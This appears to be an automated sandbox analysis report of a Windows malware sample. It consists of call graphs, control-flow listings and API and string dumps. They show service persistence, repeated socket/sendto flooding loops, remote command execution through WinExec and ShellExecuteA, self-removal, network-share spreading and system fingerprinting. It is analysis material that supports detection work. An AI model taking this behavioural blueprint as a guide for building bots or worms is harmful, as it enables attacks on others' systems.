1833->1835 1846 407fbf 1834->1846 1835->1846 1836 407e92 sendto 1837 407eb5 Sleep 1836->1837 1836->1838 1837->1838 1838->1819 1838->1824 1838->1831 1838->1836 1839 40801d RtlExitUserThread LoadLibraryA GetProcAddress 1842 40808e 1839->1842 1840->1771 1840->1772 1840->1773 1840->1784 1841 407882 sendto 1840->1841 1841->1840 1844 408124 RtlExitUserThread 1842->1844 1845 40809b wsprintfA wsprintfA 1842->1845 1843 406c10 4 API calls 1843->1846 1848 408130 1844->1848 1847 406c10 4 API calls 1845->1847 1846->1839 1846->1843 1849 408680 4 API calls 1846->1849 1850 4080e6 1847->1850 1853 40815a 14 API calls 1848->1853 1851 407fef send 1849->1851 1852 408680 4 API calls 1850->1852 1854 408017 Sleep 1851->1854 1855 4080ef send 1852->1855 1858 408235 1853->1858 1854->1846 1856 408117 Sleep 1855->1856 1856->1842 1857 408261 1858->1857 1859 4082f9 1858->1859 1860 4085da 1858->1860 1861 406c10 4 API calls 1859->1861 1884 4085fe 1860->1884 1863 408355 inet_ntoa inet_addr 1861->1863 1866 4083ab 1863->1866 1864 4085e6 1867 4083c6 htonl 1866->1867 1870 4083f9 1867->1870 1868 408441 RtlExitUserThread 1868->1870 1869 4084ad sprintf inet_ntoa inet_addr htonl 1869->1870 1870->1868 1870->1869 1871 40858f sendto 1870->1871 1871->1870 1873 407448 1872->1873 1874 40744b 1872->1874 1873->1840 1887 407350 lstrlen ??2@YAPAXI 1874->1887 1876 40746a 1876->1840 1878 406ca5 wsprintfA 1877->1878 1878->1781 1880 408697 1879->1880 1881 40869e htons connect 1879->1881 1880->1798 1882 4086d0 closesocket 1881->1882 1883 4086df 1881->1883 1882->1798 1883->1798 1885 408603 1884->1885 1886 40860a WSACleanup 1884->1886 1885->1886 1886->1864 1888 4073be 1887->1888 1888->1876 1889 4086f0 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1890 40879a 1889->1890 1891 4087a3 1890->1891 1892 406c10 4 API calls 1890->1892 1893 4087d5 1892->1893 1894 406bd0 2 API calls 1893->1894 1895 408806 inet_addr 1894->1895 1896 406c10 4 API calls 1895->1896 1897 408835 1896->1897 1898 406bd0 2 API calls 1897->1898 1899 408845 1898->1899 1900 406bd0 2 API calls 1899->1900 1901 40886a htonl 1900->1901 1906 40888e 1901->1906 1902 408abe RtlExitUserThread LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1903 406c10 4 API calls 1902->1903 1939 408b59 1903->1939 1904 406bd0 LoadLibraryA GetProcAddress 1904->1906 1905 408b89 1906->1902 1906->1904 1907 406bd0 2 API calls 1906->1907 1931 408a5c sendto 1906->1931 1909 40898b wsprintfA 1907->1909 1908 408d18 RtlExitUserThread LoadLibraryA GetProcAddress 1922 408d5f 1908->1922 1910 406bd0 2 API calls 1909->1910 1911 4089af inet_addr 1910->1911 1913 406bd0 2 API calls 1911->1913 1912 408daf RtlExitUserThread LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1914 406c10 4 API calls 1912->1914 1916 4089d6 1913->1916 1915 408e30 socket 1914->1915 1920 408e72 1915->1920 1918 406bd0 2 API calls 1916->1918 1921 4089ec htonl 1918->1921 1919 406c10 LoadLibraryA GetProcAddress inet_addr gethostbyname 1919->1922 1925 408ea8 RtlExitUserThread LoadLibraryA GetProcAddress 1920->1925 1927 408e86 sendto 1920->1927 1921->1906 1922->1912 1922->1919 1924 408680 socket htons connect closesocket 1922->1924 1932 408da6 Sleep 1922->1932 1923 408c23 wsprintfA 1926 408c47 inet_addr 1923->1926 1924->1922 1935 408f2e 1925->1935 1928 406c10 4 API calls 1926->1928 1927->1927 1929 408e9e Sleep 1927->1929 1928->1939 1929->1920 1930 408f80 RtlExitUserThread 1931->1906 1934 408ab1 Sleep 1931->1934 1932->1922 1933 406c10 4 API calls 1933->1935 1934->1906 1935->1930 1935->1933 1936 408680 4 API calls 1935->1936 1937 408f52 send 1936->1937 1938 408f7a Sleep 1937->1938 1938->1935 1939->1905 1939->1908 1939->1923 1940 408cd9 sendto 1939->1940 1940->1939 1941 408d09 Sleep 1940->1941 1941->1939 1942 408130 1960 408fb0 1942->1960 1944 40815a 14 API calls 1946 408235 1944->1946 1945 408261 1946->1945 1947 4082f9 1946->1947 1948 4085da 1946->1948 1949 406c10 4 API calls 1947->1949 1950 4085fe WSACleanup 1948->1950 1951 408355 inet_ntoa inet_addr 1949->1951 1952 4085e6 1950->1952 1954 4083ab 1951->1954 1955 4083c6 htonl 1954->1955 1958 4083f9 1955->1958 1956 408441 RtlExitUserThread 1956->1958 1957 4084ad sprintf inet_ntoa inet_addr htonl 1957->1958 1958->1956 1958->1957 1959 40858f sendto 1958->1959 1959->1958 1961 408fbc 1960->1961 1961->1944 1961->1961 1962 406db0 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1963 406bd0 2 API calls 1962->1963 1964 406e06 1963->1964 1965 406bd0 2 API calls 1964->1965 1966 406e15 1965->1966 1967 406c10 4 API calls 1966->1967 1968 406e5d socket 1967->1968 1970 406e9f 1968->1970 1971 406edc 7 API calls 1970->1971 1972 406eb3 sendto 1970->1972 1973 406f58 1971->1973 1972->1972 1974 406ecb Sleep 1972->1974 1975 406c10 4 API calls 1973->1975 1974->1970 1974->1971 1976 406f8a socket connect 1975->1976 1977 406fb2 1976->1977 1978 406fc7 1976->1978 1979 406bd0 2 API calls 1978->1979 1980 406fd1 1979->1980 1981 406bd0 2 API calls 1980->1981 1982 406fe0 1981->1982 1983 407036 RtlExitUserThread 1982->1983 1984 40701e send Sleep 1982->1984 1986 408fb0 1983->1986 1984->1982 1987 40705a 6 API calls 1986->1987 1988 4070c0 1987->1988 1989 4070d9 1988->1989 1990 406c10 4 API calls 1988->1990 1991 4070f7 1990->1991 1992 406bd0 2 API calls 1991->1992 1993 407143 1992->1993 1994 406bd0 2 API calls 1993->1994 1995 407152 1994->1995 1996 4071aa RtlExitUserThread 1995->1996 1997 40718d sendto 1995->1997 2000 4071e5 1996->2000 1997->1995 1997->1997 1998 407214 RtlExitUserThread 1999 406c10 4 API calls 1999->2000 2000->1998 2000->1999 2001 408680 4 API calls 2000->2001 2002 407208 Sleep 2001->2002 2002->2000 2003 403114 Sleep 2004 402a37 2005 402a3c LoadLibraryA GetProcAddress 2004->2005 2006 406b9a _exit 1363 4055bc 6 API calls 1364 405610 SetServiceStatus Sleep 1363->1364 1365 405681 7 API calls 1364->1365 1366 4057b0 1365->1366 1367 40579c 1365->1367 1368 40580c WSAStartup CreateThread WSAStartup CreateThread 1366->1368 1380 405336 EnumResourceNamesA 1366->1380 1367->1366 1373 4057a6 exit 1367->1373 1369 405846 1368->1369 1552 405182 WSAStartup 1368->1552 1557 4051e3 WSAStartup 1368->1557 1400 4030fd CreateThread 1369->1400 1371 4057c4 wsprintfA 1381 405348 8 API calls 1371->1381 1373->1366 1375 405851 WaitForSingleObject CloseHandle closesocket Sleep 1375->1369 1378 4057ec 1378->1368 1379 4057f5 CreateThread Sleep 1378->1379 1379->1368 1562 402dd5 1379->1562 1380->1371 1382 40543f RegOpenKeyExA 1381->1382 1384 405472 memset RegQueryValueExA 1382->1384 1385 4054d0 1382->1385 1384->1385 1386 4054d5 RegCloseKey GetFileAttributesA 1384->1386 1399 4034e5 wsprintfA LoadLibraryA 1385->1399 1386->1385 1387 4054ea CreateFileA 1386->1387 1387->1385 1388 40550a GetFileSize 1387->1388 1389 405546 CloseHandle 1388->1389 1390 405519 GlobalAlloc 1388->1390 1389->1385 1390->1389 1391 405529 ReadFile 1390->1391 1392 405551 CloseHandle BeginUpdateResourceA 1391->1392 1393 40553d GlobalFree 1391->1393 1394 405569 UpdateResourceA 1392->1394 1395 4055ac GlobalFree 1392->1395 1393->1389 1396 405584 lstrlen UpdateResourceA 1394->1396 1397 40559b EndUpdateResourceA 1394->1397 1395->1385 1396->1397 1397->1395 1398 4055a9 1397->1398 1398->1395 1399->1378 1400->1375 1401 40387c 8 API calls 1400->1401 1450 40336c LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1401->1450 1407 40393b 1502 4034e5 wsprintfA LoadLibraryA 1407->1502 1409 403943 memcpy send 1411 403e32 1409->1411 1430 4039b7 1409->1430 1412 403a32 memset 1503 4036c6 1412->1503 1414 4036c6 3 API calls 1414->1430 1415 403e49 OpenMutexA 1419 403e6a 1415->1419 1420 403e5c ReleaseMutex CloseHandle 1415->1420 1416 403d7e GetTickCount wsprintfA 1431 403de6 LoadLibraryA GetProcAddress 1416->1431 1417 403bbd lstrcpyn 1521 403135 1417->1521 1418 403c8c OpenMutexA 1424 403c9f ReleaseMutex CloseHandle 1418->1424 1439 403cad 1418->1439 1527 40351a OpenSCManagerA 1419->1527 1420->1419 1422 403b3c lstrcpyn lstrlen lstrcpyn 1515 403280 1422->1515 1423 403c22 GetDesktopWindow ShellExecuteA 1423->1412 1424->1439 1427 403ace lstrcpyn lstrlen lstrcpyn 1509 403311 1427->1509 1430->1411 1430->1412 1430->1414 1430->1415 1430->1416 1430->1417 1430->1418 1430->1422 1430->1423 1430->1427 1435 403e0f WinExec 1431->1435 1433 403f44 1434 40355b 12 API calls 1433->1434 1436 403f49 ExitProcess 1434->1436 1435->1412 1437 406bd0 LoadLibraryA GetProcAddress 1437->1439 1439->1437 1440 406bd0 2 API calls 1439->1440 1441 403d1e wsprintfA 1440->1441 1442 403d48 LoadLibraryA GetProcAddress 1441->1442 1444 403d71 1442->1444 1443 403f50 1445 40351a 5 API calls 1443->1445 1444->1412 1444->1443 1446 403f56 memset sprintf SHDeleteKeyA 1445->1446 1447 40402a 1446->1447 1448 40355b 12 API calls 1447->1448 1449 40402f WinExec ExitProcess 1448->1449 1532 4029ce 1450->1532 1453 4033f2 memset strcspn strncpy strcspn atoi 1454 403445 1453->1454 1535 406c10 LoadLibraryA GetProcAddress inet_addr 1454->1535 1457 403482 1457->1411 1458 403492 setsockopt 1457->1458 1459 4034b2 WSAIoctl 1458->1459 1460 4034e3 memset 1458->1460 1459->1460 1461 406090 6 API calls 1460->1461 1462 406111 1461->1462 1463 40625c 1462->1463 1464 40623c _mbscpy 1462->1464 1465 40628b 1463->1465 1467 40626e _mbscpy 1463->1467 1464->1463 1466 4062bd 1465->1466 1468 40629d _mbscpy 1465->1468 1469 4062ef 1466->1469 1470 4062cf _mbscpy 1466->1470 1467->1465 1468->1466 1471 40634d 1469->1471 1474 40632d _mbscpy 1469->1474 1475 40630e _mbscpy 1469->1475 1470->1469 1472 4063ac 1471->1472 1477 40638c _mbscpy 1471->1477 1478 40636d _mbscpy 1471->1478 1473 40640e 1472->1473 1479 4063cc _mbscpy 1472->1479 1480 4063ee _mbscpy 1472->1480 1476 406440 sprintf _mbscpy lstrcpy RegOpenKeyExA 1473->1476 1481 406420 _mbscpy 1473->1481 1474->1471 1475->1471 1482 4065d6 _mbscpy 1476->1482 1483 40650e 6 API calls 1476->1483 1477->1472 1478->1472 1479->1473 1480->1473 1481->1476 1484 406655 GlobalMemoryStatusEx 1482->1484 1483->1484 1485 406686 __aulldiv 1484->1485 1486 406694 wsprintfA malloc GetAdaptersInfo 1485->1486 1487 406704 GetAdaptersInfo 1486->1487 1488 4066e7 free malloc 1486->1488 1489 406953 free 1487->1489 1497 406719 1487->1497 1488->1487 1490 406974 1489->1490 1491 406969 GetTickCount 1489->1491 1490->1407 1491->1490 1492 406723 strcmp 1493 406741 GetIfTable 1492->1493 1492->1497 1494 406787 ??2@YAPAXI 1493->1494 1493->1497 1495 4067b5 GetIfTable 1494->1495 1494->1497 1496 40692b ??3@YAXPAX 1495->1496 1495->1497 1496->1497 1497->1489 1497->1492 1497->1496 1499 40680c 1497->1499 1498 406926 1498->1407 1499->1498 1500 4068f1 sprintf _mbscpy 1499->1500 1501 4068b1 sprintf _mbscpy 1499->1501 1500->1498 1501->1498 1502->1409 1504 4036da 1503->1504 1505 4036df select 1503->1505 1504->1430 1505->1504 1508 403711 1505->1508 1506 403715 __WSAFDIsSet 1506->1505 1507 403728 recv 1506->1507 1507->1504 1507->1508 1508->1504 1508->1505 1508->1506 1510 403369 1509->1510 1511 403327 1509->1511 1510->1430 1514 403358 1511->1514 1542 4030fd CreateThread 1511->1542 1543 4030fd CreateThread 1514->1543 1516 40330d 1515->1516 1518 403299 1515->1518 1516->1430 1519 4030fd 137 API calls 1518->1519 1520 4032fc 1518->1520 1519->1518 1546 4030fd CreateThread 1520->1546 1522 40327c 1521->1522 1523 403150 1521->1523 1522->1430 1524 40326c 1523->1524 1548 4030fd CreateThread 1523->1548 1549 4030fd CreateThread 1524->1549 1528 40355a memset sprintf SHDeleteKeyA 1527->1528 1529 40352d OpenServiceA 1527->1529 1528->1433 1530 403555 CloseServiceHandle 1529->1530 1531 40354b DeleteService CloseServiceHandle 1529->1531 1530->1528 1531->1530 1538 4027b0 strlen malloc 1532->1538 1534 4029e8 _mbscpy strstr 1534->1453 1534->1454 1536 406c3a gethostbyname 1535->1536 1537 40345f socket connect 1535->1537 1536->1537 1537->1457 1540 4027ed 1538->1540 1539 402967 realloc 1541 40281c 1539->1541 1540->1539 1540->1541 1541->1534 1542->1511 1544 40387c 137 API calls 1542->1544 1543->1510 1545 40387c 137 API calls 1543->1545 1546->1516 1547 40387c 137 API calls 1546->1547 1548->1523 1550 40387c 137 API calls 1548->1550 1549->1522 1551 40387c 137 API calls 1549->1551 1553 4051a6 Sleep 1552->1553 1574 40507d time _localtime32 wsprintfA 1553->1574 1555 4051b4 atoi 1555->1553 1556 4051cc Sleep CreateThread 1555->1556 1575 4050ca WSAStartup 1556->1575 1558 405207 Sleep 1557->1558 1635 40507d time _localtime32 wsprintfA 1558->1635 1560 405215 atoi 1560->1558 1561 40522d Sleep CreateThread 1560->1561 1636 405126 WSAStartup 1561->1636 1699 402a59 WSAStartup 1562->1699 1565 402f96 gethostname 1567 402fc8 gethostbyname 1565->1567 1568 4030ed WSACleanup 1565->1568 1566 4030f8 1567->1568 1572 402fe2 1567->1572 1568->1566 1569 402ff3 memset memcpy 1570 403036 memset sprintf 1569->1570 1570->1572 1571 403093 Sleep 1571->1572 1572->1568 1572->1569 1572->1570 1572->1571 1701 402ad0 8 API calls 1572->1701 1574->1555 1576 4050e3 CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1575->1576 1576->1576 1577 40407c 9 API calls 1576->1577 1625 404044 socket connect 1577->1625 1580 40464f 1581 403492 2 API calls 1582 404127 memset 1581->1582 1583 406090 46 API calls 1582->1583 1584 404146 1583->1584 1628 4034e5 wsprintfA LoadLibraryA 1584->1628 1586 40414e 1587 404170 1586->1587 1588 404174 memcpy send 1586->1588 1587->1588 1589 40463d 1588->1589 1601 4041c2 1588->1601 1589->1580 1590 40423d memset 1629 403758 1590->1629 1592 403758 3 API calls 1592->1601 1593 404654 OpenMutexA 1596 404675 1593->1596 1597 404667 ReleaseMutex CloseHandle 1593->1597 1594 4043c8 lstrcpyn 1598 403135 137 API calls 1594->1598 1595 404497 OpenMutexA 1595->1601 1602 4044aa ReleaseMutex CloseHandle 1595->1602 1603 40351a 5 API calls 1596->1603 1597->1596 1598->1601 1599 404347 lstrcpyn lstrlen lstrcpyn 1605 403280 137 API calls 1599->1605 1600 40442d GetDesktopWindow ShellExecuteA 1600->1590 1601->1589 1601->1590 1601->1592 1601->1593 1601->1594 1601->1595 1601->1599 1601->1600 1604 4045c4 GetTickCount wsprintfA 1601->1604 1607 4042d9 lstrcpyn lstrlen lstrcpyn 1601->1607 1611 406bd0 LoadLibraryA GetProcAddress 1601->1611 1616 406bd0 2 API calls 1601->1616 1619 40475b 1601->1619 1602->1601 1606 40467b memset sprintf SHDeleteKeyA 1603->1606 1608 4045f1 LoadLibraryA GetProcAddress 1604->1608 1605->1601 1610 40474f 1606->1610 1609 403311 137 API calls 1607->1609 1613 40461a WinExec 1608->1613 1609->1601 1612 40355b 12 API calls 1610->1612 1611->1601 1614 404754 ExitProcess 1612->1614 1613->1590 1617 404529 wsprintfA 1616->1617 1618 404553 LoadLibraryA GetProcAddress 1617->1618 1618->1601 1620 40351a 5 API calls 1619->1620 1621 404761 memset sprintf SHDeleteKeyA 1620->1621 1622 404835 1621->1622 1623 40355b 12 API calls 1622->1623 1624 40483a WinExec ExitProcess 1623->1624 1626 404075 1625->1626 1627 404069 closesocket 1625->1627 1626->1580 1626->1581 1627->1626 1628->1586 1630 403771 select 1629->1630 1631 40376c 1629->1631 1630->1631 1634 4037a3 1630->1634 1631->1601 1632 4037a7 __WSAFDIsSet 1632->1630 1633 4037ba recv 1632->1633 1633->1631 1633->1634 1634->1630 1634->1631 1634->1632 1635->1560 1637 40513f CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1636->1637 1637->1637 1638 4048aa 9 API calls 1637->1638 1687 40484f htons 1638->1687 1641 403492 2 API calls 1642 404955 memset 1641->1642 1643 406090 46 API calls 1642->1643 1644 404974 1643->1644 1692 4034e5 wsprintfA LoadLibraryA 1644->1692 1646 40497c memcpy send 1648 404e6b 1646->1648 1669 4049f0 1646->1669 1649 404a6b memset 1693 4037ea 1649->1693 1651 4037ea 3 API calls 1651->1669 1652 404e82 OpenMutexA 1655 404ea3 1652->1655 1656 404e95 ReleaseMutex CloseHandle 1652->1656 1653 404db7 GetTickCount wsprintfA 1668 404e1f LoadLibraryA GetProcAddress 1653->1668 1654 404cc5 OpenMutexA 1659 404cd8 ReleaseMutex CloseHandle 1654->1659 1676 404ce6 1654->1676 1660 40351a 5 API calls 1655->1660 1656->1655 1657 404bf6 lstrcpyn 1662 403135 137 API calls 1657->1662 1658 404c5b GetDesktopWindow ShellExecuteA 1658->1649 1659->1676 1665 404ea9 memset sprintf SHDeleteKeyA 1660->1665 1662->1669 1663 404b75 lstrcpyn lstrlen lstrcpyn 1666 403280 137 API calls 1663->1666 1664 404b07 lstrcpyn lstrlen lstrcpyn 1667 403311 137 API calls 1664->1667 1670 404f7d 1665->1670 1666->1669 1667->1669 1672 404e48 WinExec 1668->1672 1669->1648 1669->1649 1669->1651 1669->1652 1669->1653 1669->1654 1669->1657 1669->1658 1669->1663 1669->1664 1671 40355b 12 API calls 1670->1671 1674 404f82 ExitProcess 1671->1674 1672->1649 1673 406bd0 LoadLibraryA GetProcAddress 1673->1676 1676->1673 1677 406bd0 2 API calls 1676->1677 1678 404d57 wsprintfA 1677->1678 1679 404d81 LoadLibraryA GetProcAddress 1678->1679 1680 404daa 1679->1680 1680->1649 1681 404f89 1680->1681 1682 40351a 5 API calls 1681->1682 1683 404f8f memset sprintf SHDeleteKeyA 1682->1683 1684 405063 1683->1684 1685 40355b 12 API calls 1684->1685 1686 405068 WinExec ExitProcess 1685->1686 1688 406c10 4 API calls 1687->1688 1689 404875 socket connect 1688->1689 1690 4048a5 1689->1690 1691 404899 closesocket 1689->1691 1690->1641 1690->1648 1691->1690 1692->1646 1694 403803 select 1693->1694 1695 4037fe 1693->1695 1694->1695 1698 403835 1694->1698 1695->1669 1696 403839 __WSAFDIsSet 1696->1694 1697 40384c recv 1696->1697 1697->1695 1697->1698 1698->1694 1698->1695 1698->1696 1700 402a7d 1699->1700 1700->1565 1700->1566 1702 402b56 sprintf 1701->1702 1703 402b69 sprintf WNetAddConnection2A 1701->1703 1702->1703 1704 402beb 1703->1704 1705 402d62 1703->1705 1727 402a92 GetModuleFileNameA 1704->1727 1705->1572 1707 402bf0 Sleep memset sprintf 1708 402c31 1707->1708 1728 402a92 GetModuleFileNameA 1708->1728 1710 402c3e CopyFileA 1711 402d68 GetLocalTime memset sprintf WinExec Sleep 1710->1711 1712 402c4a memset sprintf 1710->1712 1711->1705 1713 402c7b 1712->1713 1729 402a92 GetModuleFileNameA 1713->1729 1715 402c88 1715->1711 1716 402c94 memset sprintf 1715->1716 1717 402cc5 1716->1717 1730 402a92 GetModuleFileNameA 1717->1730 1719 402cd2 1719->1711 1720 402cde memset sprintf 1719->1720 1721 402d0f 1720->1721 1731 402a92 GetModuleFileNameA 1721->1731 1723 402d1c 1723->1711 1724 402d24 memset sprintf 1723->1724 1725 402d55 1724->1725 1732 402a92 GetModuleFileNameA 1725->1732 1727->1707 1728->1710 1729->1715 1730->1719 1731->1723 1732->1705

                                                                                              Callgraph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Opacity -> Relevance
                                                                                              • Disassembly available
                                                                                              callgraph 0 Function_00407440 16 Function_00407350 0->16 1 Function_00404044 2 Function_00405244 3 Function_00406BC4 4 Function_004036C6 5 Function_00406BC7 6 Function_00405348 7 Function_00406A48 7->5 38 Function_0040597D 7->38 64 Function_00406BB2 7->64 8 Function_004050CA 35 Function_0040407C 8->35 9 Function_0040604B 10 Function_0040604D 20 Function_0040355B 10->20 11 Function_004029CE 61 Function_004027B0 11->61 12 Function_0040484F 45 Function_00406C10 12->45 13 Function_00402AD0 50 Function_00402A92 13->50 14 Function_00406BD0 47 Function_00408F90 14->47 15 Function_00406C50 29 Function_00408FF0 16->29 17 Function_00402DD5 17->13 19 Function_00402A59 17->19 18 Function_00403758 21 Function_004069E0 22 Function_004051E3 36 Function_0040507D 22->36 57 Function_00405126 22->57 23 Function_004027E4 44 Function_0040298D 23->44 24 Function_004034E5 25 Function_00408FE5 26 Function_004067E9 27 Function_004037EA 28 Function_0040336C 28->11 28->45 30 Function_00407470 30->0 30->14 30->15 39 Function_004085FE 30->39 41 Function_00408680 30->41 30->45 30->47 55 Function_00408620 30->55 56 Function_00407220 30->56 62 Function_00408FB0 30->62 31 Function_004086F0 31->14 31->41 31->45 31->47 31->55 32 Function_004059F4 33 Function_004085FB 34 Function_0040387C 34->4 34->14 34->20 34->24 34->28 40 Function_00403280 34->40 46 Function_00406090 34->46 49 Function_00403311 34->49 51 Function_00403492 34->51 53 Function_0040351A 34->53 65 Function_00403135 34->65 35->1 35->14 35->18 35->20 35->24 35->40 35->46 35->49 35->51 35->53 35->65 37 Function_004030FD 37->34 38->20 38->32 48 Function_00405B10 38->48 40->37 42 Function_00405182 42->8 42->36 43 Function_0040588B 46->21 48->10 48->14 49->37 52 Function_00403114 54 Function_00406B9A 56->29 59 Function_004048AA 57->59 58 Function_004027A8 59->12 59->14 59->20 59->24 59->27 59->40 59->46 59->49 59->51 59->53 59->65 60 Function_00408130 60->39 60->45 60->47 60->55 60->62 61->44 63 Function_00406DB0 63->14 63->41 63->45 63->62 65->37 66 Function_00405336 67 Function_00402A37 68 Function_004055BC 68->6 68->17 68->22 68->24 68->37 68->42 68->66

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 258 406090-40623a LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress GetSystemDefaultUILanguage memset 260 40625c-406263 258->260 261 40623c-406259 _mbscpy 258->261 262 406265-40626c 260->262 263 40628b-406292 260->263 261->260 262->263 266 40626e-406288 _mbscpy 262->266 264 406294-40629b 263->264 265 4062bd-4062c4 263->265 264->265 267 40629d-4062ba _mbscpy 264->267 268 4062c6-4062cd 265->268 269 4062ef-4062f6 265->269 266->263 267->265 268->269 270 4062cf-4062ec _mbscpy 268->270 271 4062f8-4062ff 269->271 272 40634d-406354 269->272 270->269 271->272 273 406301-40630c 271->273 274 406356-40635d 272->274 275 4063ac-4063b3 272->275 278 40632d-40634a _mbscpy 273->278 279 40630e-40632b _mbscpy 273->279 274->275 280 40635f-40636b 274->280 276 4063b5-4063bc 275->276 277 40640e-406415 275->277 276->277 281 4063be-4063ca 276->281 282 406440-406508 sprintf _mbscpy lstrcpy RegOpenKeyExA 277->282 283 406417-40641e 277->283 278->272 279->272 284 40638c-4063a9 _mbscpy 280->284 285 40636d-40638a _mbscpy 280->285 286 4063cc-4063ec _mbscpy 281->286 287 4063ee-40640b _mbscpy 281->287 289 4065d6-406652 _mbscpy 282->289 290 40650e-4065d4 RegQueryValueExA RegCloseKey GetSystemInfo memset sprintf _mbscpy 282->290 283->282 288 406420-40643d _mbscpy 283->288 284->275 285->275 286->277 287->277 288->282 291 406655-4066e5 GlobalMemoryStatusEx call 4069e0 * 2 wsprintfA malloc GetAdaptersInfo 289->291 290->291 296 406704-406713 GetAdaptersInfo 291->296 297 4066e7-406701 free malloc 291->297 298 406953-406967 free 296->298 299 406719-40671d 296->299 297->296 300 406974-406986 298->300 301 406969-40696f GetTickCount 298->301 299->298 302 406723-40673b strcmp 299->302 301->300 303 406741-406781 GetIfTable 302->303 304 406946-40694e 302->304 303->304 305 406787-4067af ??2@YAPAXI@Z 303->305 304->299 305->304 306 4067b5-4067d7 GetIfTable 305->306 307 40692b-406943 ??3@YAXPAX@Z 306->307 308 4067dd-406806 306->308 307->304 308->307 310 40680c-406826 308->310 311 406926 310->311 312 40682c-406846 310->312 312->311 313 40684c-40686e 312->313 313->311 314 406874-4068af 313->314 315 4068f1-406923 sprintf _mbscpy 314->315 316 4068b1-4068ef sprintf _mbscpy 314->316 315->311 316->311
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                                                                              • GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                                                                              • memset.MSVCRT ref: 004060F2
                                                                                              • _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                                                                              • _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                                                                              • _mbscpy.MSVCRT(0000005D,00000058), ref: 004062B5
                                                                                              • _mbscpy.MSVCRT(0000005D,2003), ref: 004062E7
                                                                                              • _mbscpy.MSVCRT(0000005D,Vista), ref: 00406323
                                                                                              • _mbscpy.MSVCRT(0000005D,2008), ref: 00406345
                                                                                              • _mbscpy.MSVCRT(0000005D,00000037), ref: 00406382
                                                                                              • _mbscpy.MSVCRT(0000005D,2008R2), ref: 004063A4
                                                                                              • _mbscpy.MSVCRT(0000005D,00000038), ref: 004063E4
                                                                                              • _mbscpy.MSVCRT(0000005D,2012), ref: 00406406
                                                                                              • _mbscpy.MSVCRT(0000005D,8.1), ref: 00406438
                                                                                              • sprintf.MSVCRT ref: 0040649C
                                                                                              • _mbscpy.MSVCRT(0000005D,?), ref: 004064B3
                                                                                              • lstrcpy.KERNEL32(00000000,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 004064E0
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00406500
                                                                                              • RegQueryValueExA.KERNELBASE(?,~MHz,00000000,00000004,?,000000C8), ref: 00406545
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00406552
                                                                                              • GetSystemInfo.KERNELBASE(?), ref: 0040655F
                                                                                              • memset.MSVCRT ref: 00406570
                                                                                              • sprintf.MSVCRT ref: 004065B5
                                                                                              • _mbscpy.MSVCRT(-00000003,?), ref: 004065CC
                                                                                              • _mbscpy.MSVCRT(-00000003,Find CPU Error), ref: 0040664D
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406666
                                                                                              • __aulldiv.LIBCMT ref: 00406681
                                                                                              • __aulldiv.LIBCMT ref: 0040668F
                                                                                              • wsprintfA.USER32 ref: 004066B4
                                                                                              • malloc.MSVCRT ref: 004066C9
                                                                                              • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 004066DD
                                                                                              • free.MSVCRT ref: 004066EB
                                                                                              • malloc.MSVCRT ref: 004066F8
                                                                                              • GetAdaptersInfo.IPHLPAPI(KVa7,00000000), ref: 0040670C
                                                                                              • strcmp.MSVCRT ref: 00406731
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                                                                              • sprintf.MSVCRT ref: 004068CD
                                                                                              • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$Infosprintf$AdaptersAddressLibraryLoadProcSystemTable__aulldivmallocmemset$??2@CloseDefaultGlobalLanguageMemoryOpenQueryStatusValuefreelstrcpystrcmpwsprintf
                                                                                              • String ID: %d*%u%s$%s %s %s%d$%u Gbps$%u MB$%u Mbps$0.0.0.0$2000$2003$2008$2008R2$2012$7$8$8.1$@$ADVAPI32.dll$Find CPU Error$GetVersionExA$HARDWARE\DESCRIPTION\System\CentralProcessor\0$KERNEL32.dll$KVa7$KVa7$MHz$N$P$P$RegCloseKey$S$T$Vista$Win$X$z$~MHz
                                                                                              • API String ID: 3282488517-2163519892
